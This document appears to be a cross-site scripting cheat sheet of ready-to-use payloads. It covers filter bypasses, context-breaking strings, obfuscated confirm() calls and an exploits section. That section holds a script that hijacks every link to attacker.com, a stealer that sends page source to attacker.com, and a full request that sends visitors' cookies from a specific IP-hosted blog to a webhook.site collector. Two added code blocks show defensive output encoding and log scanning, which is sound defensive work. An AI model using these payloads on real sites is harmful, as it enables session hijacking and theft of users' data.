XSS

https://github.com/payloadbox/xss-payload-list

IMPORTANT TIP: Always look at the source code, close the current HTML tag, and only then place the JS payload.

<script>print()</script> will pop up the browser print dialog, which is unlikely to be blocked by any browser.

Tip: Many modern web applications use cross-domain IFrames to handle user input, so even if the web form is vulnerable to XSS, it is not a vulnerability on the main web application. This is why the alert box shows the value of window.origin instead of a static value like 1: the alert reveals the URL it is executing on and confirms which form is the vulnerable one if an IFrame is being used.

<script>alert(window.origin)</script>

As some modern browsers may block the alert() JavaScript function in specific locations, it may be handy to know a few other basic XSS payloads to verify the existence of XSS. One such XSS payload is <plaintext>, which will stop rendering the HTML code that comes after it and display it as plaintext.

<script>alert(1)</script>

Check how the text is reflected and craft the query accordingly!

<img src=a onerror=alert("xss")>

<BODY ONLOAD=javascript:alert(1)>

If alert() is being filtered

eval("ale" + "rt('xss')")

If <> brackets are filtered.

"onmouseover="alert(1)

If single quotes (') are filtered, use double quotes, and vice versa.

One stop payload!!

Awesome Context Breaking

HTML Context

Case: <tag>You searched for $input. </tag>

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

Case: <tag attribute="$input">

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
"autofocus/onfocus="alert()

JavaScript Context

Case: <script> var something = '$input'; </script>

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
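The defensive counterpart of the three context-breaking cases above is encoding the input for the exact context it lands in. The following is an added example, not code from the original notes; the function names are mine and the encoders follow the per-context rules from the OWASP XSS Prevention Cheat Sheet (HTML entity encoding for the body, &#xHH; for attribute values, \xHH for JavaScript string literals). Fed the payloads listed above, each renderer keeps the input inside its context.

```javascript
// Added example (not from the original notes): context-aware output encoding.
// One encoder per context from the "Case:" templates above. Function names
// are assumptions of this example, not a library API.

// HTML body / text-node context: neutralise &, <, >, quotes and slash.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Quoted attribute context: encode everything except alphanumerics as &#xHH;
// so that neither a quote nor a space can terminate the attribute value.
function encodeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    '&#x' + c.charCodeAt(0).toString(16).toUpperCase() + ';');
}

// JavaScript string-literal context: \xHH-escape every non-alphanumeric
// character. This covers quotes, braces, newlines and the "</script>"
// sequence, so the HTML parser never sees a closing script tag.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The three "Case:" templates rendered with the matching encoder.
function renderHtmlContext(input) {
  return '<p>You searched for ' + encodeHtml(input) + '. </p>';
}
function renderAttrContext(input) {
  return '<input value="' + encodeAttr(input) + '">';
}
function renderJsContext(input) {
  return "<script> var something = '" + encodeJsString(input) + "'; </script>";
}

// True when the rendered output still contains the raw input, i.e. the
// input survived unencoded and could have changed context.
function leaksRawInput(rendered, input) {
  return rendered.includes(input);
}

// Stand-alone demo with the payloads from the notes.
const samples = [
  ['html', '</tag><svg onload=alert()>', renderHtmlContext],
  ['attr', '"><svg onload=alert()>', renderAttrContext],
  ['js',   "'-alert()-'", renderJsContext],
  ['js',   '</script><svg onload=alert()>', renderJsContext],
];
for (const [ctx, payload, render] of samples) {
  const out = render(payload);
  console.log(ctx, leaksRawInput(out, payload) ? 'LEAK' : 'safe', out);
}
```

Note that the encoder must match the rendering context, not the transport: `encodeHtml` alone does nothing for the JavaScript case, because `'-alert()-'` contains no HTML metacharacters.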

Awesome Confirm Variants

Yep, confirm because alert is too mainstream.

confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

Awesome Exploits

Replace all links

Array.from(document.getElementsByTagName("a")).forEach(function(i) {
  i.href = "https://attacker.com";
});

Source Code Stealer

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

XSS via "unsafe" markdown reflection. The link below is a valid payload: a markdown link whose target is an HTML data: URI (markdown HTML injection).

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

Reaching our own server using XSS and stealing sensitive information

http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E

Payload: 2"><img src=x onerror=this.src='https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?'+document.cookie;>
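From the detection side, a probe like the request above is visible in web-server access logs once the query string is URL-decoded. The following is an added example, not part of the original notes: it decodes the request target (repeatedly, so double-encoded variants like %253C are also caught) and flags a few indicators. The log lines, hostnames and the attacker.example collector are constructed for this example, and the indicator list is illustrative rather than exhaustive.

```javascript
// Added example (not from the original notes): decode access-log request
// targets and flag reflected-XSS probes. All sample data is constructed.

const SAMPLE_LOG = [
  // constructed: the blog request from the notes, collector host replaced
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://attacker.example/?%27%2bdocument.cookie;%3E HTTP/1.1" 200 512',
  // constructed: a benign request that must not be flagged
  '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /blog?blogNumber=2 HTTP/1.1" 200 1024',
  // constructed: double-encoded variant (%253C decodes to %3C, then to "<")
  '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=%253Csvg%2520onload%253Dalert%2528%2529%253E HTTP/1.1" 200 300',
];

// Illustrative indicator set; a real deployment would tune this.
const INDICATORS = [
  { name: 'html-tag',      re: /<\s*(script|svg|img|iframe|body|plaintext)\b/i },
  { name: 'event-handler', re: /\bon(load|error|focus|mouseover|click|toggle|pageshow)\s*=/i },
  { name: 'cookie-access', re: /document\.cookie/i },
  { name: 'js-uri',        re: /javascript:/i },
];

// Decode until the string stops changing (bounded), so %253C and %3C both
// end up as "<". Malformed escapes stop decoding instead of throwing.
function fullyDecode(s) {
  let prev;
  let cur = s;
  for (let i = 0; i < 5 && cur !== prev; i++) {
    prev = cur;
    try { cur = decodeURIComponent(cur); } catch (e) { break; }
  }
  return cur;
}

// Pull the request target out of a common-log-format line.
function parseRequestTarget(line) {
  const m = /"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS) (\S+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : null;
}

// Returns a finding for a suspicious line, or null for a clean one.
function scanLine(line) {
  const target = parseRequestTarget(line);
  if (!target) return null;
  const q = target.indexOf('?');
  const path = q >= 0 ? target.slice(0, q) : target;
  const decoded = fullyDecode(q >= 0 ? target.slice(q + 1) : '');
  const indicators = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
  return indicators.length ? { path, decoded, indicators } : null;
}

function scanLog(lines) {
  return lines.map(scanLine).filter(Boolean);
}

// Stand-alone run over the constructed sample.
console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The decoded query is what should be inspected, not the raw line: the raw request carries no literal `<`, `>` or `"`, so a pattern applied before decoding misses it.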

Further,
